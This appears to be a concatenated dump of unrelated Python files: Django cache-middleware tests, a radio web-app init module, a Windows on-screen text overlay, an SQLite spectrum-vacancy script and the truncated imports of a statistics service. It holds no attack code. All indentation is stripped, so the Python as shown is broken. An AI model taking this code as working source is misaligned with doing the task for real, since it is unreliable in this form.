self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
__init__.py
|
# -*- coding: utf-8 -*-
"""Radio module"""
import sys
import os
import subprocess
import threading
from radioLib import wsgiserver
from Radio import app
import logger
from pithos import pithos
from apscheduler.scheduler import Scheduler
FULL_PATH = None
RUNDIR = None
ARGS = None
DAEMON = False
PIDFILE = None
VERBOSE = True
LOG_FILE = None
LOG_LIST = []
PORT = None
DATABASE = None
INIT_LOCK = threading.Lock()
__INITIALIZED__ = False
DEVELOPMENT = False
WEBROOT = ''
radiologger = None
pandoraplayer = None
SERVER = None
HOST = '0.0.0.0'
KIOSK = False
DATA_DIR = None
SCRIPT_DIR = None
THREADS = []
SCHEDULE = Scheduler()
UPDATER = True
CURRENT_COMMIT = None
LATEST_COMMIT = None
COMMITS_BEHIND = 0
COMMITS_COMPARE_URL = ''
FIRST_RUN = 0
def initialize():
"""Init function for this module"""
with INIT_LOCK:
global __INITIALIZED__, app, FULL_PATH, RUNDIR, ARGS, DAEMON, PIDFILE, VERBOSE, LOG_FILE, LOG_DIR, radiologger, PORT, SERVER, DATABASE, AUTH, \
UPDATER, CURRENT_COMMIT, LATEST_COMMIT, COMMITS_BEHIND, COMMITS_COMPARE_URL, USE_GIT, WEBROOT, HOST, KIOSK, DATA_DIR, SCRIPT_DIR, \
THREADS, FIRST_RUN, pandoraplayer
if __INITIALIZED__:
return False
# Set up logger
if not LOG_FILE:
LOG_FILE = os.path.join(DATA_DIR, 'logs', 'radio.log')
FILENAME = os.path.basename(LOG_FILE)
LOG_DIR = LOG_FILE[:-len(FILENAME)]
if not os.path.exists(LOG_DIR):
try:
os.makedirs(LOG_DIR)
except OSError:
if VERBOSE:
print 'Unable to create the log directory.'
radiologger = logger.RadioLogger(LOG_FILE, VERBOSE)
#set up script dir
if not SCRIPT_DIR:
SCRIPT_DIR = os.path.join(RUNDIR, 'scripts')
if KIOSK:
radiologger.log('Running in KIOSK Mode, settings disabled.', 'INFO')
#Check if a version file exists. If not assume latest revision.
version_file = os.path.join(DATA_DIR, 'Version.txt')
if not os.path.exists(version_file):
FIRST_RUN = 1
# check if database exists or create it
try:
radiologger.log('Checking if PATH exists: %s' % (DATABASE), 'WARNING')
dbpath = os.path.dirname(DATABASE)
if not os.path.exists(dbpath):
try:
radiologger.log('It does not exist, creating it...', 'WARNING')
os.makedirs(dbpath)
except:
radiologger.log('Could not create %s.' % (DATABASE), 'CRITICAL')
print 'Could not create %s.' % (DATABASE)
quit()
except:
radiologger.log('Could not create %s.' % (DATABASE), 'CRITICAL')
quit()
radiologger.log('Database successfully initialised', 'INFO')
# Web server settings
from radio.config import preferences
settings = preferences.Prefs()
get_setting_value = settings.getRadioSettingValue
if get_setting_value('port'):
port_arg = False
for arg in ARGS:
if arg == '--port' or arg == '-p':
port_arg = True
if not port_arg:
PORT = int(get_setting_value('port'))
# Set up web server
if '--webroot' not in str(ARGS):
WEBROOT = get_setting_value('webroot')
if WEBROOT is None or DEVELOPMENT:
WEBROOT = ''
if WEBROOT:
if WEBROOT[0] != '/':
WEBROOT = '/' + WEBROOT
d = wsgiserver.WSGIPathInfoDispatcher({WEBROOT: app})
else:
d = wsgiserver.WSGIPathInfoDispatcher({'/': app})
SERVER = wsgiserver.CherryPyWSGIServer((HOST, PORT), d)
# Start Pandora
pandoraplayer = pithos.Pithos(radiologger)
__INITIALIZED__ = True
return True
def init_updater():
from radio.updater import checkGithub, gitCurrentVersion
global USE_GIT, CURRENT_COMMIT, COMMITS_BEHIND
if UPDATER:
if os.name == 'nt':
USE_GIT = False
else:
USE_GIT = os.path.isdir(os.path.join(RUNDIR, '.git'))
if USE_GIT:
gitCurrentVersion()
version_file = os.path.join(DATA_DIR, 'Version.txt')
if os.path.isfile(version_file):
f = open(version_file, 'r')
CURRENT_COMMIT = f.read()
f.close()
else:
COMMITS_BEHIND = -1
threading.Thread(target=checkGithub).start()
def start_schedules():
"""Add all periodic jobs to the scheduler"""
if UPDATER:
# check every 6 hours for a new version
from radio.updater import checkGithub
SCHEDULE.add_interval_job(checkGithub, hours=6)
SCHEDULE.start()
def start():
"""Start the actual server"""
if __INITIALIZED__:
#start_schedules()
if not DEVELOPMENT:
try:
radiologger.log('Starting Radio on %s:%i%s' % (HOST, PORT, WEBROOT), 'INFO')
SERVER.start()
while not True:
pass
except KeyboardInterrupt:
stop()
else:
radiologger.log('Starting Radio development server on port: %i' % (PORT), 'INFO')
radiologger.log(' ##### IMPORTANT : WEBROOT DOES NOT WORK UNDER THE DEV SERVER #######', 'INFO')
app.run(debug=True, port=PORT, host=HOST)
def stop():
"""Shutdown Radio"""
radiologger.log('Shutting down Radio...', 'INFO')
if not DEVELOPMENT:
SERVER.stop()
else:
from flask import request
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
SCHEDULE.shutdown(wait=False)
if PIDFILE:
radiologger.log('Removing pidfile: %s' % str(PIDFILE), 'INFO')
os.remove(PIDFILE)
def restart():
"""Restart Radio"""
SERVER.stop()
popen_list = [sys.executable, FULL_PATH]
popen_list += ARGS
radiologger.log('Restarting Radio with: %s' % popen_list, 'INFO')
SCHEDULE.shutdown(wait=False)
subprocess.Popen(popen_list, cwd=RUNDIR)
def daemonize():
"""Start Radio as a daemon"""
if threading.activeCount() != 1:
radiologger.log('There are %s active threads. Daemonizing may cause strange behavior.' % threading.activeCount(), 'WARNING')
sys.stdout.flush()
sys.stderr.flush()
try:
pid = os.fork()
if pid == 0:
pass
else:
radiologger.log('Forking once...', 'DEBUG')
os._exit(0)
except OSError, e:
sys.exit('1st fork failed: %s [%d]' % (e.strerror, e.errno))
os.chdir('/')
os.umask(0)
os.setsid()
try:
pid = os.fork()
if pid > 0:
radiologger.log('Forking twice...', 'DEBUG')
os._exit(0)
except OSError, e:
sys.exit('2nd fork failed: %s [%d]' % (e.strerror, e.errno))
pid = os.getpid()
radiologger.log('Daemonized to PID: %s' % pid, 'INFO')
if PIDFILE:
radiologger.log('Writing PID %s to %s' % (pid, PIDFILE), 'INFO')
file(PIDFILE, 'w').write("%s\n" % pid)
@app.context_processor
def utility_processor():
def webroot_url(url=''):
return WEBROOT + url
return dict(webroot_url=webroot_url)
|
tos.py
|
import sys, os, time
rootPath = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.split(os.path.split(rootPath)[0])[0])
import RTool.util.importer as imp
exec(imp.ImportHandler(
["win32api", "win32con", "win32gui", "win32ui"]))
#import win32api, win32con, win32gui, win32ui
from threading import Thread
class TextWindow:
global ref
ref = []
def __init__(self, text):
self.text = text
self.hInstance = None
self.hWindow = None
self.wndClassAtom = None
t = Thread(target=self.Tmain)
t.start()
#self.Tmain()
def delete(self):
try:
if self.hWindow != None:
win32gui.PostMessage(self.hWindow, win32con.WM_DESTROY, 0, 0)
time.sleep(0.1) # wait for window to close
win32gui.UnregisterClass(self.wndClassAtom, self.hInstance)
ref.remove(self)
print("Deleted",self.text)
else:
print("No hWindow:",self.text)
del self
except:
e = sys.exc_info()[0]
print( "<p>Error: %s</p>" % e )
def refCheck(self):
self.deleteAll()
ref.append(self)
@staticmethod
def deleteAll():
if ref != []:
for i in ref:
i.delete()
def Tmain(self):
self.refCheck()
self.hInstance = win32api.GetModuleHandle()
className = 'MyWindowClassName'
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633576(v=vs.85).aspx
# win32gui does not support WNDCLASSEX.
wndClass = win32gui.WNDCLASS()
# http://msdn.microsoft.com/en-us/library/windows/desktop/ff729176(v=vs.85).aspx
wndClass.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW
wndClass.lpfnWndProc = self.wndProc
wndClass.hInstance = self.hInstance
wndClass.hCursor = win32gui.LoadCursor(None, win32con.IDC_ARROW)
wndClass.hbrBackground = win32gui.GetStockObject(win32con.WHITE_BRUSH)
wndClass.lpszClassName = className
# win32gui does not support RegisterClassEx
self.wndClassAtom = win32gui.RegisterClass(wndClass)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ff700543(v=vs.85).aspx
# Consider using: WS_EX_COMPOSITED, WS_EX_LAYERED, WS_EX_NOACTIVATE, WS_EX_TOOLWINDOW, WS_EX_TOPMOST, WS_EX_TRANSPARENT
# The WS_EX_TRANSPARENT flag makes events (like mouse clicks) fall through the window.
exStyle = win32con.WS_EX_COMPOSITED | win32con.WS_EX_LAYERED | win32con.WS_EX_NOACTIVATE | win32con.WS_EX_TOPMOST | win32con.WS_EX_TRANSPARENT
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms632600(v=vs.85).aspx
# Consider using: WS_DISABLED, WS_POPUP, WS_VISIBLE
style = win32con.WS_DISABLED | win32con.WS_POPUP | win32con.WS_VISIBLE
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms632680(v=vs.85).aspx
self.hWindow = win32gui.CreateWindowEx(
exStyle,
self.wndClassAtom,
None, # WindowName
style,
0, # x
0, # y
win32api.GetSystemMetrics(win32con.SM_CXSCREEN), # width
win32api.GetSystemMetrics(win32con.SM_CYSCREEN), # height
None, # hWndParent
None, # hMenu
self.hInstance,
None # lpParam
)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633540(v=vs.85).aspx
win32gui.SetLayeredWindowAttributes(self.hWindow, 0x00ffffff, 255, win32con.LWA_COLORKEY | win32con.LWA_ALPHA)
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145167(v=vs.85).aspx
#win32gui.UpdateWindow(hWindow)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633545(v=vs.85).aspx
win32gui.SetWindowPos(self.hWindow, win32con.HWND_TOPMOST, 0, 0, 0, 0,
win32con.SWP_NOACTIVATE | win32con.SWP_NOMOVE | win32con.SWP_NOSIZE | win32con.SWP_SHOWWINDOW)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633548(v=vs.85).aspx
#win32gui.ShowWindow(self.hWindow, win32con.SW_SHOW)
win32gui.PumpMessages()
#print("PumpMessages is off")
def wndProc(self, hWnd, message, wParam, lParam):
if message == win32con.WM_PAINT:
hdc, paintStruct = win32gui.BeginPaint(hWnd)
dpiScale = win32ui.GetDeviceCaps(hdc, win32con.LOGPIXELSX) / 60.0
fontSize = 80
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145037(v=vs.85).aspx
lf = win32gui.LOGFONT()
lf.lfFaceName = "Times New Roman"
lf.lfHeight = int(round(dpiScale * fontSize))
#lf.lfWeight = 150
# Use nonantialiased to remove the white edges around the text.
# lf.lfQuality = win32con.NONANTIALIASED_QUALITY
hf = win32gui.CreateFontIndirect(lf)
win32gui.SelectObject(hdc, hf)
rect = win32gui.GetClientRect(hWnd)
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd162498(v=vs.85).aspx
win32gui.DrawText(
hdc,
self.text,
-1,
rect,
win32con.DT_CENTER | win32con.DT_NOCLIP | win32con.DT_SINGLELINE | win32con.DT_VCENTER
)
win32gui.EndPaint(hWnd, paintStruct)
return 0
elif message == win32con.WM_DESTROY:
print('Closing the window.')
win32gui.PostQuitMessage(0)
return 0
else:
return win32gui.DefWindowProc(hWnd, message, wParam, lParam)
def main():
test = None
text = "What"
for i in range(10):
test = TextWindow(str(10-i))
#print(i)
time.sleep(1)
#test.delete()
TextWindow.deleteAll()
'''
test = TextOnScreen("Poop")
time.sleep(2)
print("?")
test.delete()
#del test
test2 = TextOnScreen("What?")
time.sleep(1)
test2.delete()
'''
if __name__ == '__main__':
main()
|
determine_vacant_spectrum.py
|
'''
Summary:
'''
import sqlite3
from sqlite3 import Error
#from interval import Interval, IntervalSet
#from interval import Interval, IntervalSet
import intervals as interval #requires: pip install python-intervals
import threading
import time
from time import gmtime, strftime
'''
Global constants
'''
#databases
spectrum_data_base = "openspectrum.db"
#database tables
spectrum_assignment_long_term = "freqAssignment" #occupied spectrum
spectrum_unassigned = "unassigned_freq" #vacant spetrum
spectrum_assignment_dynamic = "dynamic_freq_assignment" #dynamically assigned spectrum or short-term spectrum lease
spectrum_assignment_changes_flag = "flags" # containts binary values (0/1) to indicate whether or not there's been a change in frequency assignment
spectrum_operators = "operators"
spectrum_license = "spectrumLicense"
#frequency bands
nine_hundred_MHz_band_start = 880
nine_hundred_MHz_band_end = 960
eighteen_hundred_MHz_band_start = 1710
eighteen_hundred_MHz_band_end = 1880
twenty_one_hundred_MHz_band_start = 1920
twenty_one_hundred_MHz_band_end = 2170
twenty_six_hundred_MHz_band_start = 2500
twenty_six_hundred_MHz_band_end = 2690
"""
Attemping to combine above frequency ranges into one list
"""
bands = [(nine_hundred_MHz_band_start, nine_hundred_MHz_band_end),
(eighteen_hundred_MHz_band_start, eighteen_hundred_MHz_band_end),
(twenty_one_hundred_MHz_band_start, twenty_one_hundred_MHz_band_end ),
(twenty_six_hundred_MHz_band_start, twenty_six_hundred_MHz_band_end)]
#Other
boundary = 1
spectrum_info_update_interval = 5 #in seconds
def spectrum_assignment_changes_monitor(conn):
'''
Periodically check if there any changes in frequence assignment
'''
while True:
#keep checking for changes in spectrum assignment
conn = create_connection(spectrum_data_base)
cur = conn.cursor()
sql = "SELECT fixed_frequency_assignment, dynamic_frequency_assignment FROM " + spectrum_assignment_changes_flag
cur.execute(sql)
val2 = cur.fetchone() #returns first row, which is all there is
print strftime("%Y-%m-%d %H:%M:%S", gmtime()), 'Flag status:', val2[0], val2[1]
#print 'Flag status:', val2[0], val2[1]
if (val2[0] == 1 or val2[1] == 1):
print 'Refreshing unassigned frequency'
#recalculate vacant spetrum
vacant_spectrum_finder(conn)
time.sleep (spectrum_info_update_interval)
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by the db_file
:param db_file: database file
:return: Connection object or None
"""
try:
conn = sqlite3.connect(db_file)
return conn
except Error as e:
print(e)
return None
def vacant_spectrum_finder(conn):
'''
-Let A be total spectrum in a given frequency band.
-Let B be assigned frequencies (nationally and long term).
-Unassigned frequencies C = A - B
-Further let D be dynamic and possibly short term frequency assignments
-Vacant spectrum C' = C - D
----------------------------------------------------
'''
'''
start by erasing previous records of unassigned spectrum
'''
sql = 'DELETE FROM '+spectrum_unassigned
cur = conn.cursor()
cur.execute(sql) #delete all previous table contents
'''
fetch statically assigned frequencies
'''
cur = conn.cursor()
# do a table join and use the country ID for Mozambique
#based on database schema: https://dbdiagram.io/d/5c719df7f7c5bb70c72f1a9a
sql = 'SELECT freqStart, freqEnd FROM '+spectrum_assignment_long_term+ \
' INNER JOIN spectrumLicense ON freqAssignment.license_ID = spectrumLicense.ID \
INNER JOIN '+ spectrum_operators +' ON ' +spectrum_operators+'.ID = '+ spectrum_license +'.Operator_ID \
WHERE ' +spectrum_operators+'.country_ID = 152'
cur.execute(sql)
static_frequency_assignment = cur.fetchall()
'''
fetch dynamic frequency assignment
'''
cur = conn.cursor()
sql = 'SELECT * FROM '+spectrum_assignment_dynamic
cur.execute(sql)
dynamic_frequency_assignment = cur.fetchall()
'''
Specify total spectrum in terms of START and STOP frequency
'''
#r = interval.closed(nine_hundred_MHz_band_start, nine_hundred_MHz_band_end) #900 MHz band
#r = interval.closed(eighteen_hundred_MHz_band_start, eighteen_hundred_MHz_band_end) #1800 MHz band
#r = interval.closed(twenty_one_hundred_MHz_band_start, twenty_one_hundred_MHz_band_end) #2100 MHz band
#r = interval.closed(twenty_six_hundred_MHz_band_start, twenty_six_hundred_MHz_band_end) #2600 MHz band
'''
substract assigned frequencies (long term) from total frequency range i.e A-B
'''
for band in bands:
r = interval.closed(band[0], band[1])
for row in static_frequency_assignment:
#cur.execute(sql + str(row))
#vacant_spectrum.append(row)
'''
The logic "interval.closed(row[x], row[y])" denotes start and end points of a range.
'x' and 'y' are the columns in the table.
For example, since we only selected `freqStart` and `freqEnd` from the database, the values are in column number 0 & 1
'''
r1 = interval.closed(row[0]-boundary, row[1]+boundary) # -,+ 'boundary' ensures overlapingbounds are excluded
temp = r - r1
r = temp
'''
Subtract dynamically assigned frequencies i.e. C- D
'''
for row in dynamic_frequency_assignment:
r1 = interval.closed(row[2]-boundary, row[3]+boundary)
temp = r - r1
r = temp
vacant_spectrum = [] #list of rows
vacant_spectrum = temp
'''
Save the newly calculated unoccupied frequencies to database if vacant_spectrum != empty
'''
freq_band = ""
if (check_if_list_empty(temp)==True ): #needs fixing, currently breaks when list is empty [4 July 2019]
print 'No vacant spectrum found'
else:
cur = conn.cursor()
for item in vacant_spectrum:
'''
Determine frequency band
'''
if item in interval.closed(nine_hundred_MHz_band_start, nine_hundred_MHz_band_end):
freq_band = "900"
elif item in interval.closed(eighteen_hundred_MHz_band_start, eighteen_hundred_MHz_band_end):
freq_band = "1800"
elif item in interval.closed(twenty_one_hundred_MHz_band_start, twenty_one_hundred_MHz_band_end):
freq_band = "2100"
elif item in interval.closed(twenty_six_hundred_MHz_band_start, twenty_six_hundred_MHz_band_end):
freq_band = "2600"
#The ID field is set to auto-increment and is also the primary key
sql = 'INSERT INTO '+spectrum_unassigned+' (freqStart, freqEnd, band) VALUES (' + str(item).strip("( ) []")+ ','+freq_band +')' #strip off the brackets if any
cur.execute(sql)
print (temp)
'''
Reset the flags
'''
cur = conn.cursor()
sql = 'UPDATE '+spectrum_assignment_changes_flag + ' SET fixed_frequency_assignment = 0, dynamic_frequency_assignment = 0'
cur.execute(sql)
conn.commit() #commit changes
return None
def check_if_list_empty(seq):
try:
return all(map(check_if_list_empty, seq))
except TypeError:
return False
def main():
conn = create_connection(spectrum_data_base) #create a database connection
with conn:
print("Attempting to find unassigned spectrum:")
'''
Initial calculation of unassigned frequencies
'''
vacant_spectrum_finder(conn)
'''
Monitor frequency assignment status
'''
threading.Thread(target = spectrum_assignment_changes_monitor, args =(conn,)).start()
if __name__ == '__main__':
main()
|
statistics_service.py
|
import time
import traceback
import dataclasses
from dataclasses import dataclass
from abc import ABCMeta, abstractmethod
from collections import deque
from datetime import datetime
from threading import Thread, Lock
from typing import Optional, TypeVar, Generic, Deque, Type, Callable, Dict, Any, TYPE_CHECKING
from bxcommon import constants
from bxutils import log_messages
from bxutils import logging
from bxutils.logging import CustomLogger
from bxutils.logging.log_level import LogLevel
from bxutils.logging.log_record_type import LogRecordType
logger = logging.get_logger(__name__)
task_duration_logger = logging.get_logger(LogRecordType.TaskDuration, __name__)
